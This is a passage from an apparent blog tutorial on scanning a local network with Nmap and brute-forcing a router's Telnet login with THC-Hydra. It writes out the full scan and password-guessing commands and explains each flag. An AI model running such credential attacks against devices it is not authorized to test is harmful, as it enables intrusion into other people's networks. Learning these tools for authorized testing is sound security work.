In my case, the range is at least 10.1.1.1-4, but I'll go from 1 to 10 just to be safe. Fire up Nmap and do a ping scan “nmap -sP 10.1.1.1-10” to see what hosts are alive, and wait for the results
:
Pick a host to port scan – I picked 10.1.1.1 because it is a router, and for most people the password is generally pretty simple, if not default. Port scan it using something like “nmap -sS -sV -P 0 -T5 -O 10.1.1.1” and see if it's running any services (click on the “Ports/Hosts” tab at the end for a simpler view of the services running and their ports). If you dont understand on how to use NMAP,read the basics here
Now we will be attacking the Telnet port because I know that it works, because I know you guys think Telnet is the be-all and end-all of hacking, and because the Windows version of THC-Hydra isn't compiled with LIBSSH support (unless you did it yourself), and as such I can't attack SSH – otherwise I'd be doing that instead. It's so much better. Head back to your command session, and review the output from Hydra before; it tells you the services it can crack. After looking through it, and realising that Telnet definitely is there, we can now proceed to attack it with the command
“hydra -l admin -P passlist.txt 10.1.1.1 telnet”as is demonstrated here:
An explanation of the command: -l admin was used because I assumed that the router would have the login of “admin”. You can use username lists as well if you wish. -P passlist.txt specified a password dictionary named “passlist.txt” - make sure to have the -P include the capital P, otherwise you'll be specifying a password to try.
10.1.1.1 is the routers IP address, and telnet is the protocol we want to attack. Now obviously we could tell it to attack that protocol on a different port, but we won't bother with that right now unless anyone else wants to see how. My dictionary only included 4 words for the purpose of this tutorial. You can see the cracked password circled at the end (which by the way, isn't my password for the router, for those of you who know how to get my IP and wanna try and break in :P). And that's how to do a basic hydra service crack on Windows.
No comments:
Post a Comment